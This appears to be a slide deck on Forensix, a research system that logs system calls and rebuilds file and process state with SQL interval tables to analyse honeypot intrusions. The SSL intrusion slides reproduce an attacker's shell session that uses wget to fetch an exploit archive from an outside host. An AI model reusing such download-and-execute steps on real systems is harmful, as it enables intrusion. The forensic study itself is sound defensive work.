Title: Intrusion Analysis by Reconstructing System State
1Intrusion Analysis by Reconstructing System State
- Ashvin Goel
- University of Toronto
- Joint work with
- Kenneth Po, Kamran Farhadi
- Wu-chang Feng and the
- Forensix group at PSU
2Motivation
- Nothing is certain but death, taxes, and 0wned machines
- Exploits in software, security policies, policy enforcement
- Compromised accounts
- Employees gone bad
- Sometimes, you need to quickly find out exactly what happened on a system
- Current forensic techniques are inadequate
- Incomplete audit information
- Reconstruction process is manual and error-prone
3The Forensix approach
- Record all system activity, automate replay
- Computer TiVo
- Enable fast and accurate forensic analysis of compromised machine
- What about the costs?
- Forensic investigator time is expensive
- Computing and storage resources are cheap and plentiful
- 40 6 month replay log (small web server)
- 10-20% performance degradation
- Cost proposition becomes more favorable every day
4Issues
- Auditing accuracy (races and proper event attribution)
- Page cache auditing to disambiguate write() races
- Permeating attribution throughout kernel
- Auditing overhead
- Elimination of full read() logging
- Batching and other kernel optimizations
- Webstone benchmark > 20% degradation
- Reconstruction queries for intrusion analysis
5Intrusion Analysis
- Helps understand cause of attack
- After intrusion detection phase
- Helps minimize after-effects of intrusions
- Allows accurate assessment of extent of damage
- Retrieval of uncorrupted data
- Retrieval of attack code
- Replay of system activities related to attack
- Restarting services as soon as possible
- Helps determine attack signatures
- Can improve intrusion detection process
6Analysis Requirements
- Complete - analysis of all intrusions
- Predictable - analysis shouldn't disturb evidence
- Flexible - comprehensive views of system state
- Replay bug - reconstruct specific activities
- Dependency - express relations between activities
- Real-time - iterative process
- Performance - low overhead
7Complete Analysis
- Capture system call activity
- Host intrusions must manipulate processes, files
- Requires making system calls
- Assumptions
- Kernel is not compromised
- Disable writes to kernel memory
8Forensix architecture
9Forensix Architecture
- Figure: Forensix architecture diagram
- Target system (public network): application server, operating system, authenticated system-call logging facility
- Provides complete, authenticated service
- Logging pinhole over private network
- Backend storage system: append-only files, batched record processing, database backend, forensic analysis
- System-call data analyzed on backend system
- Provides completeness and predictability
10Flexibility?
- System call data is too low level
- Deals with kernel entities (FDs, PIDs)
- Gives state change information
- Humans are interested in user-visible system state
- User-level entities (files, process names)
- Need system state information at a given time/interval
- Reconstruction is linear, complicated and slow
- System semantics are complicated
- Process identifier can have different names (e.g., execve)
- File descriptor can have different names (e.g., close, dup)
- Analysis tools are hard to write and slow
11Example 1
- User query
- List all processes that existed in the last hour
- Query over raw audit data
- Process all fork and wait audit events to determine lifetimes of each process on the system
- Select those processes that existed in the last hour
- Improvement
- Time-indexed process table
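The contrast in this example can be sketched in Python. This is only an illustration: the `Event` layout, the function names, and the sample data are assumptions, not Forensix code. The linear pass over fork and wait events runs once, and the "last hour" question then becomes a simple overlap test against the resulting table.

```python
from typing import Iterable, List, NamedTuple, Optional


class Event(NamedTuple):
    time: int      # seconds on an arbitrary clock (hypothetical layout)
    syscall: str   # "fork" or "wait"
    pid: int       # child created by fork, or child reaped by wait


class Lifetime(NamedTuple):
    pid: int
    begin: int
    end: Optional[int]   # None while the process is still running


def build_process_table(events: Iterable[Event]) -> List[Lifetime]:
    """One linear pass over the audit events, done once."""
    open_rows = {}   # pid -> begin time of the process that is still alive
    table = []
    for ev in sorted(events, key=lambda e: e.time):
        if ev.syscall == "fork":
            open_rows[ev.pid] = ev.time
        elif ev.syscall == "wait" and ev.pid in open_rows:
            table.append(Lifetime(ev.pid, open_rows.pop(ev.pid), ev.time))
    # Processes never reaped are still running: leave their end time open.
    table.extend(Lifetime(pid, begin, None) for pid, begin in open_rows.items())
    return table


def alive_between(table: List[Lifetime], start: int, end: int) -> List[int]:
    """PIDs whose lifetime overlaps the interval [start, end]."""
    return sorted(
        row.pid for row in table
        if row.begin <= end and (row.end is None or row.end >= start)
    )


EVENTS = [
    Event(100, "fork", 10), Event(200, "wait", 10),
    Event(3000, "fork", 11), Event(5000, "wait", 11),
    Event(6000, "fork", 12),
]
PROCESS_TABLE = build_process_table(EVENTS)
LAST_HOUR = alive_between(PROCESS_TABLE, start=3600, end=7200)
```

With the sample events, PID 10 ends before the window opens, while PIDs 11 and 12 overlap it.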
12Example 2
- Suspected ptrace-execve race that created a new setuid binary yesterday
- User query
- Compare setuid root binaries of today to a few days ago
- Find files with owner=O and permission=P at time=T
13Example 2
- Query over raw audit data
- Find all files owned by O at time T
- For each file created (mkdir, mknod, create, symlink), find last event (chown) before T that set owner to O
- Remove files that were deleted before T (rmdir, unlink)
- Find all files with permission P at time T
- For each file created (mkdir, mknod, create, symlink), find last event (chmod) before T that set permission to P
- Remove files that were deleted before T (rmdir, unlink)
- Return intersection of above two queries
- Problem
- All events must be examined (only last one matters)
14Example 3
- Suspected rootkit (rkid.tar.gz) and local root exploit (xpl.tar.gz) packages installed on machine at some point in time
- Unpack into directories named rkid and xpl
- User query
- Find the contents of directory=D at time=T
- Query over raw audit data
- Find each file created (mkdir, mknod, create, symlink, link), updated (rename), or removed (rmdir, unlink) from directory=D before time=T
- Problem (same as Example 2, replay all events)
15Other examples
- Tracking modifications to /etc/passwd
- Find the path name of a file whose inode=I at time=T
- Return all modifications done on inode=I
- Privilege escalations
- Find processes whose effective user id=E between Ts and Te
16Reconstructing System State
17System State Mappings
- Map kernel entities to user-visible system state
- Track changes to this mapping over time
- Table of object and attribute lifetimes
- Allows analysis tools to reuse reconstructed state
- Mappings constructed upon audit insertion to backend database
- Lifetimes stored in interval tables
18Interval Tables
19Interval tables
- Each table has ID, begin and end time
- Complexity of system semantics interpreted when mappings are constructed
- Analysis queries written in SQL
- Without iteration or recursion
- Easier optimization of queries
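A minimal sketch of an interval table, using Python's sqlite3 as a stand-in for the backend database. The table name `process_name`, its columns, and the sample rows are assumptions made for illustration. The sketch uses half-open intervals so that a boundary time matches exactly one row, which is a choice of this sketch and not something the slides specify.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE process_name (
    pid   INTEGER NOT NULL,   -- kernel entity
    name  TEXT    NOT NULL,   -- user-visible attribute
    ts    INTEGER NOT NULL,   -- begin of interval
    te    INTEGER             -- end of interval, NULL while still current
);
-- PID 42 starts as a shell and execve()s another program at time 150.
INSERT INTO process_name VALUES (42, 'bash', 100, 150);
INSERT INTO process_name VALUES (42, 'wget', 150, 300);
INSERT INTO process_name VALUES (43, 'sshd',  50, NULL);
""")


def name_at(pid, t):
    """User-visible name of a PID at time t, or None if it did not exist."""
    row = conn.execute(
        "SELECT name FROM process_name "
        "WHERE pid = ? AND ts <= ? AND (te IS NULL OR ? < te)",
        (pid, t, t),
    ).fetchone()
    return row[0] if row else None
```

The lookup is a single SELECT with no iteration or recursion: the execve semantics were already resolved when the rows were written.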
20Constructing Mappings
- Mappings are constructed for a time interval
- Need at least two queries
- New rows created with begin time
- Update current rows with end time
- Construction is idempotent
- Allows overlapping construction, deletion, recreation
- Reconstruction must be in time order
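The two-query pattern and its idempotence can be sketched with sqlite3. The simplified `event` schema, the `UNIQUE` key, and the `construct` helper are assumptions for illustration; the deck's own MySQL version appears on the "Example of Mapping Construction" slide. Re-running a window, or running overlapping windows in time order, leaves the mapping unchanged.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE event (time INTEGER, syscall TEXT, inode INTEGER, path TEXT);
CREATE TABLE inode_mapping (
    inode INTEGER, path TEXT, begintime INTEGER, endtime INTEGER,
    UNIQUE (inode, path, begintime)   -- lets the INSERT be repeated safely
);
INSERT INTO event VALUES (10, 'mkdir',  7, '/tmp/rkid');
INSERT INTO event VALUES (20, 'mknod',  8, '/tmp/rkid/dev');
INSERT INTO event VALUES (30, 'unlink', 8, '/tmp/rkid/dev');
""")


def construct(start, finish):
    """Build mappings for the window [start, finish]."""
    # Query 1: create new rows, filling in only the begin time.
    conn.execute(
        """INSERT OR IGNORE INTO inode_mapping (inode, path, begintime)
           SELECT inode, path, time FROM event
           WHERE syscall IN ('mkdir', 'mknod') AND time BETWEEN ? AND ?
           ORDER BY time""",
        (start, finish),
    )
    # Query 2: set the end time of rows that are still open.
    conn.execute(
        """UPDATE inode_mapping
           SET endtime = (SELECT MIN(e.time) FROM event e
                          WHERE e.syscall IN ('unlink', 'rmdir')
                            AND e.inode = inode_mapping.inode
                            AND e.path = inode_mapping.path
                            AND e.time >= inode_mapping.begintime
                            AND e.time BETWEEN ? AND ?)
           WHERE endtime IS NULL""",
        (start, finish),
    )


# Overlapping windows, then the whole range again.
construct(0, 25)
construct(15, 40)
construct(0, 40)
ROWS = conn.execute(
    "SELECT inode, path, begintime, endtime FROM inode_mapping ORDER BY inode"
).fetchall()
```

The `endtime IS NULL` guard is what keeps the second query from overwriting an interval that an earlier run already closed.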
21Mapping Issues
- Each kernel entity should be unique
- PID, INODE have to be unique
- PID
- Add generation number during backend processing
- Generation number initialized to current time
- INODE
- Persistent generation number available from file system
- Generation number is incremented when inode is reused
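One way to picture the PID generation number is the sketch below. It assumes that "current time" means the timestamp of the fork event that created the process, and the event tuple layout and the function name are hypothetical. Two processes that reuse the same PID end up with different (pid, generation) keys.

```python
def assign_generations(events):
    """Tag each event with a unique (pid, generation) key.

    events: iterable of (time, syscall, pid) tuples in time order, where
    the pid of a fork event is the PID of the newly created child.
    """
    current = {}   # pid -> generation of the process currently using it
    tagged = []
    for time, syscall, pid in events:
        if syscall == "fork":
            # Assumption: the generation is the creation time of the process.
            current[pid] = time
        generation = current.get(pid)   # None if the process predates the log
        tagged.append((time, syscall, (pid, generation)))
        if syscall == "exit":
            current.pop(pid, None)      # the PID may now be reused
    return tagged


EVENTS = [
    (100, "fork", 500), (110, "write", 500), (120, "exit", 500),
    (900, "fork", 500), (910, "write", 500),   # PID 500 reused later
]
TAGGED = assign_generations(EVENTS)
```

The two write events carry the same PID but belong to different processes, which the generation makes visible.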
22Example 2 revisited
- Find files with owner=O and permission=P at time=T
SELECT f.inode
FROM file_owner f
WHERE f.owner = O AND f.permission = P
  AND T BETWEEN f.ts AND f.te
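The original user question in Example 2, comparing setuid root binaries across two points in time, can be sketched as a set difference of two point-in-time queries. The sketch uses sqlite3 with a `file_owner` table shaped like the one in the query; the sample rows, the numeric permission encoding, and the helper names are assumptions for illustration.

```python
import sqlite3

SETUID_ROOT = 0o4755   # assumed encoding of permission bits for the sketch

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE file_owner "
    "(inode INTEGER, owner INTEGER, permission INTEGER, ts INTEGER, te INTEGER)"
)
conn.executemany(
    "INSERT INTO file_owner VALUES (?, ?, ?, ?, ?)",
    [
        (11, 0, SETUID_ROOT, 0, 9999),     # setuid root throughout
        (12, 1000, 0o755, 0, 500),         # ordinary user file ...
        (12, 0, SETUID_ROOT, 500, 9999),   # ... that becomes setuid root at 500
    ],
)

AT_T = (
    "SELECT inode FROM file_owner "
    "WHERE owner = ? AND permission = ? AND ? BETWEEN ts AND te"
)


def files_at(owner, permission, t):
    """Inodes with the given owner and permission at time t."""
    return {row[0] for row in conn.execute(AT_T, (owner, permission, t))}


def new_since(owner, permission, t_old, t_new):
    """Inodes matching at t_new that did not match at t_old."""
    sql = AT_T + " EXCEPT " + AT_T
    args = (owner, permission, t_new, owner, permission, t_old)
    return sorted(row[0] for row in conn.execute(sql, args))
```

Calling `new_since(0, SETUID_ROOT, 100, 600)` on the sample data singles out inode 12, the file that gained setuid root status between the two times.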
23Example 3 revisited
- Find the contents of directory=D at time=T
SELECT i.file_name
FROM inode i
WHERE i.parent_inode = D
  AND T BETWEEN i.ts AND i.te
24Analysis Tools
25Types of Tools
- File-Access Tracker
- Shows files accessed or modified in a time interval
- IO Tracker
- Replays IO performed by processes
- Reconstructs contents of files and directories
- Dependency Tracker
- Displays dependencies between processes and files
26File-Access Tracker
- General query to display access or modification times of files
- Uses two queries
- Calls that use paths (rename, unlink, etc.)
- Calls that use file descriptors
- Shows all names of accessed or modified files
- Hard links, removes, renames, etc.
- Filtering to limit results
- Event type (e.g., create, open), time interval, last access, file names, file attributes, process names, process attributes
- Implemented via a join of interval tables and underlying Forensix tables
27SQL code for finding files modified via file descriptors
-- Syscall names are assumed to be stored as strings;
-- starttime and finishtime bound the interval of interest.
SELECT i.inode, MAX(e.time)
FROM event e, fd_mapping f, inode_mapping i
WHERE e.syscall IN ('read', 'write', 'fchown', 'fchmod', 'truncate')
  AND f.pid = e.pid
  AND f.fd = e.fd
  AND f.i_id = i.id
  AND e.time BETWEEN f.begintime AND f.endtime
  AND e.time BETWEEN starttime AND finishtime
GROUP BY i.inode
28IO Tracker
- Process IO tracker
- List all I/O of a process
- Useful for recreating shell session (w/ descendants)
- Use process interval table to get PID given a name
- Use inode interval table to get inode of terminal
- File IO tracker
- List all I/O for a file
- Useful for reconstructing access to and modification of files
- Use inode interval table to get inode of file
29Process IO Tracker
-- Collect write events of the tracked processes on the terminal.
INSERT INTO tmp_event (id, time)
SELECT e.id, e.time
FROM event e, fd_mapping f, tmp_pid p, inode_mapping i
WHERE e.syscall IN ('write')
  AND f.pid = e.pid
  AND f.pid = p.pid
  AND f.fd = e.fd
  AND f.i_id = i.id
  AND e.time BETWEEN f.begintime AND f.endtime
  AND i.path = path;  -- path of the terminal, e.g., /dev/pts0

-- Replay the recorded data in time order.
SELECT data
FROM io, tmp_event e
WHERE io.parent = e.id
ORDER BY e.time;
- Find descendants of PID to track user sessions
30File IO Tracker
- File tracker
- Similar to process IO tracker, but with inode instead of PID
- Obtains inode at recreation time
- Recreates opens, writes, seeks and truncates
- Does not currently track memory-mapped writes
31Directory Tracker
- List paths in inode interval table with prefix that matches directory
- See Example 3
32Dependency Tracker
- Used to determine contamination of system by malicious activity
- Process to process dependencies
- Fork or execve
- File to process dependencies
- Process reads from file
- Process to File dependencies
- Process writes to file
- File to file dependencies (bidirectional)
- Two file names refer to same file (link, chroot)
33Backward and Forward Tracking
- Need one or more detection points
- Backward tracking
- Shows sequence of states that lead to a detection point
- Forward tracking
- Shows sequence of states affected by a detection point
- Needs filters for additional pruning
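Backward and forward tracking can be pictured as time-aware reachability over dependency edges. The sketch below is an illustration under assumptions, not the Forensix implementation: the edge list, node labels, and `track` function are hypothetical, and real tools would read the edges from the interval and event tables.

```python
from collections import deque

# (source, target, time): the target depends on the source as of `time`.
EDGES = [
    ("proc:httpd", "proc:sh", 10),           # fork or execve
    ("proc:sh", "file:/tmp/xpl", 20),        # process writes to file
    ("file:/home/u/notes", "proc:sh", 25),   # process reads file (too late)
    ("file:/tmp/xpl", "proc:xpl", 30),       # process reads from file
    ("proc:xpl", "file:/etc/passwd", 40),    # process writes to file
    ("proc:cron", "file:/var/log/cron", 15),
]


def track(start, start_time, forward):
    """Return the nodes reachable from a detection point, respecting time.

    Backward: follow edges into a node that happened no later than the time
    at which that node mattered. Forward: follow edges out of a node that
    happened no earlier than the time at which that node was affected.
    """
    bound = {start: start_time}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        limit = bound[node]
        for src, dst, t in EDGES:
            if forward and src == node and t >= limit:
                nxt = dst
            elif not forward and dst == node and t <= limit:
                nxt = src
            else:
                continue
            # Keep the most permissive bound seen so far for each node.
            improved = nxt not in bound or (
                t < bound[nxt] if forward else t > bound[nxt]
            )
            if improved:
                bound[nxt] = t
                queue.append(nxt)
    return sorted(n for n in bound if n != start)


BACKWARD = track("file:/etc/passwd", 50, forward=False)
FORWARD = track("proc:sh", 10, forward=True)
```

In the sample data the read of `/home/u/notes` happens after the shell wrote `/tmp/xpl`, so backward tracking from `/etc/passwd` leaves it out. That time ordering is one form of pruning; further filters would still be needed on real logs.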
34Evaluation
35Setup
- Honeypot system
- Redhat 7.1 (seawolf) distribution
- Vulnerabilities
- Httpd with SSL
- Wu-ftpd
- Sendmail
- Ptrace
- 2600 AMD Athlon frontend
- Intel Pentium 2.4 GHz backend, 512 MB, 120 GB
36FTP intrusion 1: Files Modified Daily
37Analysis of FTP Intrusion 1
Directory  Count  Modified file         Time
/bin       1      /bin/netstat          05-17 15:54:17
/etc       28     /etc/passwd           05-17 15:52:04
                  /etc/group            05-17 15:51:29
                  ...
/ftp       1773
/home      6
/incoming  3
/root      1      /root/.bash_history   05-17 16:43:25
/sbin      1      /sbin/ifconfig        05-17 15:54:18
/spool     5
/tmp       328
/var       29
/usr       3      /usr/bin/killall      05-17 15:54:22
                  /usr/bin/chfn         05-17 16:04:14
                  /usr/bin/chsh         05-17 16:06:04
Files modified by root, grouped by directory
38FTP intrusion 2
39Analysis of FTP intrusion 2
Directory  Count  Modified file         Time
/bin       74     /bin/kill             05-12 17:11:58
                  /bin/ps               05-12 17:11:46
/dev       3
/etc       84     /etc/passwd           05-12 17:11:20
/home      11
/lib       588
/root      3      /root/.bash_history   05-12 18:40:32
/sbin      175    /sbin/ldconfig        05-12 17:12:09
/tmp       26
/var       452
/usr       26     /usr/bin/killall      05-12 17:11:46
Files modified by root, grouped by directory
40FTP intrusion 2 analysis
41Overhead (Busiest Day)
42Performance Under Heavy Load
- Storage needs under heavy load
- 8-10 GB per day
- Mapping tables can be purged and recreated
43Related Work
- System call monitoring
- USTAT uses state transitions to detect intrusions
- Tripwire, Coroner's Toolkit, Sleuth Kit
- Detects file modifications
- Recovers deleted files from unallocated disk blocks
- Sebek
- Captures write calls to replay attacker's keystrokes
- ReVirt, Backtracker
- LIDS
- Secure front-end operation
- Elephant file system
- Provides file system snapshots
44Conclusions
- Empower the user when system is compromised
- Provide a complete picture of the extent of damage
- Retrieve uncorrupted data
- Provide hints to harden system
- Implement tools to allow analysis of large data
- Create mappings
- Between kernel entities and user-visible state
- Simplifies tools
- Allows intrusion analysis in near real-time
45Current status
- Project page
- http://syn.cs.pdx.edu/projects/4N6
- Source code availability
- http://forensix.sourceforge.net
- Sample queries
- Replay Shell (demo), Process Tree, Privilege Escalation
46Future Work
- Reduce mapping time
- Reduce/filter the amount of data collected
- Apply tools for intrusion detection
47Future work
- Incorporating functionality from other forensic tools
- Full audit trail allows Forensix to superset other tools
- Selective undo
- Back to the Future
- Automate system restoration
48Example of Mapping Construction
/* Create new row. Fill begin time */
INSERT IGNORE INTO inode_mapping (inode, path, type, begintime)
SELECT p.inode, p.dst_path, p.type, e.time
FROM event e, path p
WHERE e.id = p.parent
  AND e.syscall IN ('mknod', 'mkdir', 'link', 'rename', 'symlink')
  AND e.returncode >= 0  /* successful calls only */
  AND e.time BETWEEN mapping_starttime AND mapping_finishtime;

/* Update end time */
UPDATE inode_mapping i, event e, path p
SET i.endtime = e.time
WHERE e.id = p.parent
  AND e.syscall IN ('unlink', 'rename', 'rmdir')
  AND i.inode = p.inode
  AND i.path = p.src_path
  AND i.endtime IS NULL
  AND e.returncode >= 0  /* successful calls only */
  AND e.time BETWEEN mapping_starttime AND mapping_finishtime;
49Issues With Constructing Mappings
- Exit and close can be implicit
- E.g., process killed by signal
- Examine status of parent's wait system call
- Allows building queries based on signal information
- State of currently running processes not known
- Open file descriptors
- Files currently on system
- Vfork seen after process starts executing
- Inode number obtained before or after system call
- Race condition
- Remotely mounted files
- Inode numbers are not unique
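For the implicit-exit case, the status reported by the parent's wait call tells whether the child exited on its own or was killed by a signal. The sketch below decodes such a status with Python's standard `os` helpers; the `classify_wait_status` name is hypothetical, and the literal status values in the usage lines assume the Linux encoding.

```python
import os
import signal


def classify_wait_status(status):
    """Decode a raw wait() status into (kind, detail)."""
    if os.WIFSIGNALED(status):
        # Implicit exit: the process never called exit() itself.
        return ("killed", signal.Signals(os.WTERMSIG(status)).name)
    if os.WIFEXITED(status):
        return ("exited", os.WEXITSTATUS(status))
    return ("other", status)


# On Linux, a status of 9 means "terminated by signal 9" and 256 means
# "exited with code 1".
KILLED = classify_wait_status(9)
EXITED = classify_wait_status(256)
```

A mapping builder could use the "killed" case to close the process row and every file descriptor row of that process at the time of the wait event.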
50Backward Tracking the SSL Intrusion
51Forward Tracking the SSL Intrusion
- Login
- Editing source file
- Man page - chfn
- Compiling second attack
52Analysis of SSL Intrusion
- connected using addr 0xbffff7dc - overflow?
- bash-2.04 cd /var/tmp
- bash-2.04 wget http://pub.inter.net/xpl.tgz
- --12:32:42-- http://pub.inter.net/xpl.tgz
- => `xpl.tgz'
- Connecting to pub.inter.net:80...
- public.inter.net: Host not found.
- bash-2.04 ftp -v XXX.XXX.XXX.XXX
53IO Tracking the SSL Intrusion
- connected using addr 0xbffff7dc - overflow?
- bash-2.04 cd /var/tmp
- bash-2.04 wget http://pub.inter.net/xpl.tgz
- --12:32:42-- http://pub.inter.net/xpl.tgz
- => `xpl.tgz'
- Connecting to pub.inter.net:80...
- public.inter.net: Host not found.
- bash-2.04 ftp -v XXX.XXX.XXX.XXX
54Ftpd Attack Analysis
55SSL Attack Analysis
56Bug Fixes
- Direct delivery from kernel to backend
- Tricky implementation
- 1-2 copies
- Removing forensix module works now
- Race between processes using the module and module being removed
- Removed auto increment in event table
- Comma fixes for loading
- Vfork fix